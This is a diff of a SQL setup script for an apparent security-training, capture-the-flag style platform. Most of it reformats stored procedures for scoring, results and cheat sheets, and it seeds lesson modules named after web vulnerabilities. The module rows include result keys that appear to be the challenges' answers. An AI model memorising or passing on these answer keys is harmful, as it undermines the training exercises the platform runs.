+    resultSubmission = theMessage
     WHERE moduleId = theModuleId
-      AND userId = theUserId;
-    COMMIT;
+    AND userId = theUserId;
+COMMIT;
 END
 
 -- $$
@@ -1213,13 +1051,13 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`resultMessagePlus`(IN theModuleId VARCHAR(64), IN theUserId2 VARCHAR(64))
+CREATE PROCEDURE `core`.`resultMessagePlus` (IN theModuleId VARCHAR(64), IN theUserId2 VARCHAR(64))
 BEGIN
-    UPDATE results
-    SET csrfCount = csrfCount + 1
+UPDATE results SET
+    csrfCount = csrfCount + 1
     WHERE userId = theUserId2
-      AND moduleId = theModuleId;
-    COMMIT;
+    AND moduleId = theModuleId;
+COMMIT;
 END
 
 -- $$
@@ -1232,14 +1070,13 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`csrfLevelComplete`(IN theModuleId VARCHAR(64), IN theUserId2 VARCHAR(64))
+CREATE PROCEDURE `core`.`csrfLevelComplete` (IN theModuleId VARCHAR(64), IN theUserId2 VARCHAR(64))
 BEGIN
-    DECLARE temp INT;
-    COMMIT;
-    SELECT csrfCount
-    FROM results
+	DECLARE temp INT;
+COMMIT;
+SELECT csrfCount FROM results
     WHERE userId = theUserId2
-      AND moduleId = theModuleId;
+    AND moduleId = theModuleId;
 END
 
 -- $$
@@ -1252,11 +1089,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetIdFromHash`(IN theHash VARCHAR(191))
+CREATE PROCEDURE `core`.`moduleGetIdFromHash` (IN theHash VARCHAR(191))
 BEGIN
-    COMMIT;
-    SELECT moduleId
-    FROM modules
+COMMIT;
+SELECT moduleId FROM modules
     WHERE moduleHash = theHash;
 END
 
@@ -1269,11 +1105,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userGetNameById`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`userGetNameById` (IN theUserId VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT userName
-    FROM users
+COMMIT;
+SELECT userName FROM users
     WHERE userId = theUserId;
 END
 -- $$
@@ -1286,11 +1121,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userGetIdByName`(IN theUserName VARCHAR(64))
+CREATE PROCEDURE `core`.`userGetIdByName` (IN theUserName VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT userId
-    FROM users
+COMMIT;
+SELECT userId FROM users
     WHERE userName = theUserName;
 END
 -- $$
@@ -1303,11 +1137,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userClassId`(IN theUserName VARCHAR(64))
+CREATE PROCEDURE `core`.`userClassId` (IN theUserName VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT classId
-    FROM users
+COMMIT;
+SELECT classId FROM users
     WHERE userName = theUserName;
 END
 -- $$
@@ -1320,24 +1153,20 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userBadSubmission`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`userBadSubmission` (IN theUserId VARCHAR(64))
 BEGIN
-    UPDATE users
-    SET badSubmissionCount = badSubmissionCount + 1
+UPDATE users SET
+    badSubmissionCount = badSubmissionCount + 1
     WHERE userId = theUserId;
-    COMMIT;
-    UPDATE users
-    SET userScore = userScore - userScore / 10
-    WHERE userId = theUserId
-      AND badSubmissionCount > 40
-      AND userScore > 5;
-    COMMIT;
-    UPDATE users
-    SET userScore = userScore - 10
-    WHERE userId = theUserId
-      AND badSubmissionCount > 40
-      AND userScore <= 5;
-    COMMIT;
+COMMIT;
+UPDATE users SET
+	userScore = userScore - userScore/10
+	WHERE userId = theUserId AND badSubmissionCount > 40 AND userScore > 5;
+COMMIT;
+UPDATE users SET
+	userScore = userScore - 10
+	WHERE userId = theUserId AND badSubmissionCount > 40 AND userScore <= 5;
+COMMIT;
 END
 -- $$
 -- DELIMITER ;
@@ -1349,12 +1178,12 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`resetUserBadSubmission`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`resetUserBadSubmission` (IN theUserId VARCHAR(64))
 BEGIN
-    UPDATE users
-    SET badSubmissionCount = 0
+UPDATE users SET
+    badSubmissionCount = 0
     WHERE userId = theUserId;
-    COMMIT;
+COMMIT;
 END
 -- $$
 -- DELIMITER ;
@@ -1366,19 +1195,18 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleComplete`(IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleComplete` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
 BEGIN
-    DECLARE theDate DATETIME;
-    COMMIT;
-    SELECT NOW()
-    FROM DUAL
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL
     INTO theDate;
-    UPDATE results
-    SET finishTime = theDate
+UPDATE results SET
+    finishTime = theDate
     WHERE startTime IS NOT NULL
-      AND moduleId = theModuleId
-      AND userId = theUserId;
-    COMMIT;
+    AND moduleId = theModuleId
+    AND userId = theUserId;
+COMMIT;
 END
 
 -- $$
@@ -1390,25 +1218,25 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`cheatSheetCreate`(IN theModule VARCHAR(64), IN theSheet LONGTEXT)
+CREATE PROCEDURE `core`.`cheatSheetCreate` (IN theModule VARCHAR(64), IN theSheet LONGTEXT)
 BEGIN
-    DECLARE theDate DATETIME;
-    DECLARE theId VARCHAR(64);
+DECLARE theDate DATETIME;
+DECLARE theId VARCHAR(64);
     COMMIT;
-    UPDATE sequence
-    SET currVal = currVal + 1
-    WHERE tableName = 'cheatSheet';
+    UPDATE sequence SET
+        currVal = currVal + 1
+        WHERE tableName = 'cheatSheet';
     COMMIT;
-    SELECT NOW() FROM DUAL INTO theDate;
+	SELECT NOW() FROM DUAL INTO theDate;
 
-    SELECT SHA(CONCAT(currVal, tableName, theDate))
-    FROM `core`.`sequence`
-    WHERE tableName = 'cheatSheet'
-    INTO theId;
+    SELECT SHA(CONCAT(currVal, tableName, theDate)) FROM `core`.`sequence`
+        WHERE tableName = 'cheatSheet'
+        INTO theId;
 
     INSERT INTO `core`.`cheatsheet`
         (cheatSheetId, moduleId, createDate, solution)
-    VALUES (theId, theModule, theDate, theSheet);
+        VALUES
+        (theId, theModule, theDate, theSheet);
     COMMIT;
 END
 
@@ -1421,11 +1249,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetAll`()
+CREATE PROCEDURE `core`.`moduleGetAll` ()
 BEGIN
-    COMMIT;
-    SELECT moduleId, moduleName, moduleType, moduleCategory
-    FROM modules
+COMMIT;
+SELECT moduleId, moduleName, moduleType, moduleCategory FROM modules
     ORDER BY moduleType, moduleCategory, moduleName;
 END
 -- $$
@@ -1437,12 +1264,11 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`cheatSheetGetSolution`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`cheatSheetGetSolution` (IN theModuleId VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT moduleName, solution
-    FROM modules
-             JOIN cheatsheet USING (moduleId)
+COMMIT;
+SELECT moduleName, solution FROM modules
+    JOIN cheatsheet USING (moduleId)
     WHERE moduleId = theModuleID
     ORDER BY createDate DESC;
 END
@@ -1455,11 +1281,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetHashById`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleGetHashById` (IN theModuleId VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT moduleHash
-    FROM modules
+COMMIT;
+SELECT moduleHash FROM modules
     WHERE moduleId = theModuleId;
 END
 
@@ -1472,18 +1297,17 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userCheckResult`(IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`userCheckResult` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
 BEGIN
-    COMMIT;
+COMMIT;
 -- Returns a module Name if the user has not completed the module identified by moduleId
-    SELECT moduleName
-    FROM results
-             JOIN modules USING (moduleId)
+SELECT moduleName FROM results
+    JOIN modules USING(moduleId)
     WHERE finishTime IS NULL
-      AND startTime IS NOT NULL
-      AND finishTime IS NULL
-      AND userId = theUserId
-      AND moduleId = theModuleId;
+    AND startTime IS NOT NULL
+    AND finishTime IS NULL
+    AND userId = theUserId
+    AND moduleId = theModuleId;
 END
 
 
@@ -1496,22 +1320,9 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleIncrementalInfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleIncrementalInfo` (IN theUserId VARCHAR(64))
 BEGIN
-    (SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime, incrementalRank
-     FROM modules
-              LEFT JOIN results USING (moduleId)
-     WHERE userId = theUserId
-       AND moduleStatus = 'open')
-    UNION
-    (SELECT moduleNameLangPointer, moduleCategory, moduleId, null, incrementalRank
-     FROM modules
-     WHERE moduleStatus = 'open'
-       AND moduleId NOT IN (SELECT moduleId
-                            FROM modules
-                                     JOIN results USING (moduleId)
-                            WHERE userId = theUserId))
-    ORDER BY incrementalRank;
+(SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime, incrementalRank FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategory, moduleId, null, incrementalRank FROM modules WHERE moduleStatus = 'open' AND moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId)) ORDER BY incrementalRank;
 END
 
 -- $$
@@ -1523,18 +1334,13 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleFeedback`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleFeedback` (IN theModuleId VARCHAR(64))
 BEGIN
-    SELECT userName,
-           TIMESTAMPDIFF(MINUTE, finishTime, startTime) * (-1),
-           difficulty,
-           knowledgeBefore,
-           knowledgeAfter,
-           resultSubmission
-    FROM modules
-             LEFT JOIN results USING (moduleId)
-             LEFT JOIN users USING (userId)
-    WHERE moduleId = theModuleId;
+SELECT userName, TIMESTAMPDIFF(MINUTE, finishTime, startTime)*(-1), difficulty, knowledgeBefore, knowledgeAfter, resultSubmission
+	FROM modules
+	LEFT JOIN results USING (moduleId)
+  LEFT JOIN users USING (userId)
+  WHERE moduleId = theModuleId;
 END
 -- $$
 -- DELIMITER ;
@@ -1545,26 +1351,12 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userProgress`(IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`userProgress` (IN theClassId VARCHAR(64))
 BEGIN
     COMMIT;
-    SELECT userName, count(finishTime), userScore
-    FROM users
-             JOIN results USING (userId)
-    WHERE finishTime IS NOT NULL
-      AND classId = theClassId
-    GROUP BY userName
-    UNION
-    SELECT userName, 0, userScore
-    FROM users
-    WHERE classId = theClassId
-      AND userId NOT IN (SELECT userId
-                         FROM users
-                                  JOIN results USING (userId)
-                         WHERE classId = theClassId
-                           AND finishTime IS NOT NULL
-                         GROUP BY userName)
-    ORDER BY userScore DESC;
+SELECT userName, count(finishTime), userScore FROM users JOIN results USING (userId) WHERE finishTime IS NOT NULL
+AND classId = theClassId
+GROUP BY userName UNION SELECT userName, 0, userScore FROM users WHERE classId = theClassId AND userId NOT IN (SELECT userId FROM users JOIN results USING (userId) WHERE classId = theClassId AND finishTime IS NOT NULL GROUP BY userName) ORDER BY userScore DESC;
 END
 
 -- $$
@@ -1577,15 +1369,12 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`classScoreboard`(IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`classScoreboard` (IN theClassId VARCHAR(64))
 BEGIN
     COMMIT;
-    SELECT userId, userName, userScore, goldMedalCount, silverMedalCount, bronzeMedalCount
-    FROM users
-    WHERE classId = theClassId
-      AND userRole = 'player'
-      AND userScore > 0
-    ORDER BY userScore DESC, goldMedalCount DESC, silverMedalCount DESC, bronzeMedalCount DESC, userId ASC;
+SELECT userId, userName, userScore, goldMedalCount, silverMedalCount, bronzeMedalCount FROM users
+	WHERE classId = theClassId AND userRole = 'player' AND userScore > 0
+	ORDER BY userScore DESC, goldMedalCount DESC, silverMedalCount DESC, bronzeMedalCount DESC, userId ASC;
 END
 
 -- $$
@@ -1598,14 +1387,12 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`totalScoreboard`()
+CREATE PROCEDURE `core`.`totalScoreboard` ()
 BEGIN
     COMMIT;
-    SELECT userId, userName, userScore, goldMedalCount, silverMedalCount, bronzeMedalCount
-    FROM users
-    WHERE userRole = 'player'
-      AND userScore > 0
-    ORDER BY userScore DESC, goldMedalCount DESC, silverMedalCount DESC, bronzeMedalCount DESC, userId ASC;
+SELECT userId, userName, userScore, goldMedalCount, silverMedalCount, bronzeMedalCount FROM users
+	WHERE userRole = 'player' AND userScore > 0
+	ORDER BY userScore DESC, goldMedalCount DESC, silverMedalCount DESC, bronzeMedalCount DESC, userId ASC;
 END
 
 -- $$
@@ -1618,18 +1405,15 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userStats`(IN theUserName VARCHAR(32))
+CREATE PROCEDURE `core`.`userStats` (IN theUserName VARCHAR(32))
 BEGIN
-    DECLARE temp INT;
-    SELECT COUNT(*) FROM modules INTO temp;
-    SELECT userName,
-           sum(TIMESTAMPDIFF(MINUTE, finishTime, startTime) * (-1)) AS "Time",
-           CONCAT(COUNT(*), "/", temp)                              AS "Progress"
+DECLARE temp INT;
+SELECT COUNT(*) FROM modules INTO temp;
+SELECT userName, sum(TIMESTAMPDIFF(MINUTE, finishTime, startTime)*(-1)) AS "Time", CONCAT(COUNT(*),"/", temp) AS "Progress"
     FROM modules
-             LEFT JOIN results USING (moduleId)
-             LEFT JOIN users USING (userId)
-    WHERE userName = theUserName
-      AND resultSubmission IS NOT NULL
+    LEFT JOIN results USING (moduleId)
+    LEFT JOIN users USING (userId)
+    WHERE userName = theUserName AND resultSubmission IS NOT NULL
     GROUP BY userName;
 END
 
@@ -1642,16 +1426,15 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userStatsDetailed`(IN theUserName VARCHAR(32))
+CREATE PROCEDURE `core`.`userStatsDetailed` (IN theUserName VARCHAR(32))
 BEGIN
-    DECLARE temp INT;
-    SELECT COUNT(*) FROM modules INTO temp;
-    SELECT userName, moduleName, TIMESTAMPDIFF(MINUTE, finishTime, startTime) * (-1) AS "Time"
+DECLARE temp INT;
+SELECT COUNT(*) FROM modules INTO temp;
+SELECT userName, moduleName, TIMESTAMPDIFF(MINUTE, finishTime, startTime)*(-1) AS "Time"
     FROM modules
-             LEFT JOIN results USING (moduleId)
-             LEFT JOIN users USING (userId)
-    WHERE userName = theUserName
-      AND resultSubmission IS NOT NULL
+    LEFT JOIN results USING (moduleId)
+    LEFT JOIN users USING (userId)
+    WHERE userName = theUserName AND resultSubmission IS NOT NULL
     ORDER BY incrementalRank;
 END
 
@@ -1664,23 +1447,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleOpenInfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleOpenInfo` (IN theUserId VARCHAR(64))
 BEGIN
-    (SELECT moduleName, moduleCategory, moduleId, finishTime
-     FROM modules
-              LEFT JOIN results USING (moduleId)
-     WHERE userId = theUserId
-       AND moduleStatus = 'open')
-    UNION
-    (SELECT moduleName, moduleCategory, moduleId, null
-     FROM modules
-     WHERE moduleId NOT IN (SELECT moduleId
-                            FROM modules
-                                     JOIN results USING (moduleId)
-                            WHERE userId = theUserId
-                              AND moduleStatus = 'open')
-       AND moduleStatus = 'open')
-    ORDER BY moduleCategory, moduleName;
+(SELECT moduleName, moduleCategory, moduleId, finishTime FROM modules LEFT JOIN results USING (moduleId)
+WHERE userId = theUserId AND moduleStatus = 'open') UNION (SELECT moduleName, moduleCategory, moduleId, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') AND moduleStatus = 'open') ORDER BY moduleCategory, moduleName;
 END
 
 -- $$
@@ -1692,23 +1462,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleClosednfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleClosednfo` (IN theUserId VARCHAR(64))
 BEGIN
-    (SELECT moduleName, moduleCategory, moduleId, finishTime
-     FROM modules
-              LEFT JOIN results USING (moduleId)
-     WHERE userId = theUserId
-       AND moduleStatus = 'closed')
-    UNION
-    (SELECT moduleName, moduleCategory, moduleId, null
-     FROM modules
-     WHERE moduleId NOT IN (SELECT moduleId
-                            FROM modules
-                                     JOIN results USING (moduleId)
-                            WHERE userId = theUserId
-                              AND moduleStatus = 'closed')
-       AND moduleStatus = 'closed')
-    ORDER BY moduleCategory, moduleName;
+(SELECT moduleName, moduleCategory, moduleId, finishTime
+FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'closed') UNION (SELECT moduleName, moduleCategory, moduleId, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'closed') AND moduleStatus = 'closed') ORDER BY moduleCategory, moduleName;
 END
 -- $$
 -- DELIMITER ;
@@ -1720,23 +1477,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleTournamentOpenInfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleTournamentOpenInfo` (IN theUserId VARCHAR(64))
 BEGIN
-    (SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime, incrementalRank, scoreValue
-     FROM modules
-              LEFT JOIN results USING (moduleId)
-     WHERE userId = theUserId
-       AND moduleStatus = 'open')
-    UNION
-    (SELECT moduleNameLangPointer, moduleCategory, moduleId, null, incrementalRank, scoreValue
-     FROM modules
-     WHERE moduleId NOT IN (SELECT moduleId
-                            FROM modules
-                                     JOIN results USING (moduleId)
-                            WHERE userId = theUserId
-                              AND moduleStatus = 'open')
-       AND moduleStatus = 'open')
-    ORDER BY incrementalRank, scoreValue, moduleNameLangPointer;
+(SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime, incrementalRank, scoreValue FROM modules LEFT JOIN results USING (moduleId)
+WHERE userId = theUserId AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategory, moduleId, null, incrementalRank, scoreValue FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') AND moduleStatus = 'open') ORDER BY incrementalRank, scoreValue, moduleNameLangPointer;
 END
 
 -- $$
@@ -1749,12 +1493,12 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleSetStatus`(IN theModuleId VARCHAR(64), IN theStatus VARCHAR(16))
+CREATE PROCEDURE `core`.`moduleSetStatus` (IN theModuleId VARCHAR(64), IN theStatus VARCHAR(16))
 BEGIN
-    UPDATE modules
-    SET moduleStatus = theStatus
+UPDATE modules SET
+    moduleStatus = theStatus
     WHERE moduleId = theModuleId;
-    COMMIT;
+COMMIT;
 END
 -- $$
 -- DELIMITER ;
@@ -1765,686 +1509,178 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleAllStatus`()
+CREATE PROCEDURE `core`.`moduleAllStatus` ()
 BEGIN
-    SELECT moduleId, moduleName, moduleStatus
+SELECT moduleId, moduleName, moduleStatus
     FROM modules;
 END
 -- $$
 -- DELIMITER ;
 ;
 
-SET SQL_MODE = @OLD_SQL_MODE;
-SET FOREIGN_KEY_CHECKS = @OLD_FOREIGN_KEY_CHECKS;
-SET UNIQUE_CHECKS = @OLD_UNIQUE_CHECKS;
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
-SELECT "Data for table `core`.`sequence`"
-FROM DUAL;
+SELECT "Data for table `core`.`sequence`" FROM DUAL;
 -- -----------------------------------------------------
-SET AUTOCOMMIT = 0;
+SET AUTOCOMMIT=0;
 USE `core`;
-INSERT INTO `core`.`sequence` (`tableName`, `currVal`)
-VALUES ('users', '282475249');
-INSERT INTO `core`.`sequence` (`tableName`, `currVal`)
-VALUES ('cheatSheet', '282475299');
-INSERT INTO `core`.`sequence` (`tableName`, `currVal`)
-VALUES ('class', '282475249');
-INSERT INTO `core`.`sequence` (`tableName`, `currVal`)
-VALUES ('modules', '282475576');
+INSERT INTO `core`.`sequence` (`tableName`, `currVal`) VALUES ('users', '282475249');
+INSERT INTO `core`.`sequence` (`tableName`, `currVal`) VALUES ('cheatSheet', '282475299');
+INSERT INTO `core`.`sequence` (`tableName`, `currVal`) VALUES ('class', '282475249');
+INSERT INTO `core`.`sequence` (`tableName`, `currVal`) VALUES ('modules', '282475576');
 
 COMMIT;
 
 -- -----------------------------------------------------
-SELECT "Data for table `core`.`settings`"
-FROM DUAL;
+SELECT "Data for table `core`.`settings`" FROM DUAL;
 -- -----------------------------------------------------
-SET AUTOCOMMIT = 0;
+SET AUTOCOMMIT=0;
 USE `core`;
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('adminCheatsEnabled', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('playerCheatsEnabled', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('moduleLayout', 'ctf');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('enableFeedback', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('openRegistration', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('scoreboardStatus', 'open');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('scoreboardClass', '');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('hasStartTime', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('startTime', '2019-01-01T12:00:00');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('hasLockTime', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('lockTime', '2020-01-01T12:00:00');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('hasEndTime', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('endTime', '2020-02-01T12:00:00');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('enableTranslations', true);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('defaultClass', '');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('adminCheatsEnabled', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('playerCheatsEnabled', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('moduleLayout', 'ctf');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('enableFeedback', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('openRegistration', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('scoreboardStatus', 'open');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('scoreboardClass', '');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('hasStartTime', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('startTime', '2019-01-01T12:00:00');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('hasLockTime', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('lockTime', '2020-01-01T12:00:00');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('hasEndTime', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('endTime', '2020-02-01T12:00:00');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('enableTranslations', true);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('defaultClass', '');
 
 COMMIT;
 
 -- -----------------------------------------------------
-SELECT "Inserting Data for table `core`.`modules`"
-FROM DUAL;
+SELECT "Inserting Data for table `core`.`modules`" FROM DUAL;
 -- -----------------------------------------------------
-SET AUTOCOMMIT = 0;
+SET AUTOCOMMIT=0;
 USE `core`;
 
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0dbea4cb5811fff0527184f99bd5034ca9286f11', 'Insecure Direct Object References',
-        'insecure.direct.object.references', 'lesson', 'Insecure Direct Object References',
-        'insecure.direct.object.references', '59e571b1e59441e76e0c85e5b49',
-        'fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100', 'open', '5', '10', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('b9d82aa7b46ddaddb6acfe470452a8362136a31e', 'Poor Data Validation', 'poor.data.validation', 'lesson',
-        'Poor Data Validation', 'poor.data.validation',
-        '6680b08b175c9f3d521764b41349fcbd3c0ad0a76655a10d42372ebccdfdb4bb',
-        '4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f', 'open', '6', '10', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('bf847c4a8153d487d6ec36f4fca9b77749597c64', 'Security Misconfiguration', 'security.misconfiguration', 'lesson',
-        'Security Misconfigurations', 'security.misconfigurations',
-        '55b34717d014a5a355f6eced4386878fab0b2793e1d1dbfd23e6262cd510ea96',
-        'fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833', 'open', '7', '10', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('9533e21e285621a676bec58fc089065dec1f59f5', 'Broken Session Management', 'broken.session.management', 'lesson',
-        'Session Management', 'session.management', '6594dec9ff7c4e60d9f8945ca0d4',
-        'b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806', 'open', '16', '10', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access',
-        'lesson', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', 'f60d1337ac4d35cb67880a3adda79',
-        'oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3', 'open', '25', '15', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ca8233e0398ecfa76f9e05a49d49f4a7ba390d07', 'Cross Site Scripting', 'cross.site.scripting', 'lesson', 'XSS',
-        'xss', 'ea7b563b2935d8587539d747d', 'zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a', 'open',
-        '26', '15', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('cd7f70faed73d2457219b951e714ebe5775515d8', 'Cross Site Scripting 1', 'cross.site.scripting.1', 'challenge',
-        'XSS', 'xss', '445d0db4a8fc5d4acb164d022b', 'd72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa',
-        'open', '35', '20', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
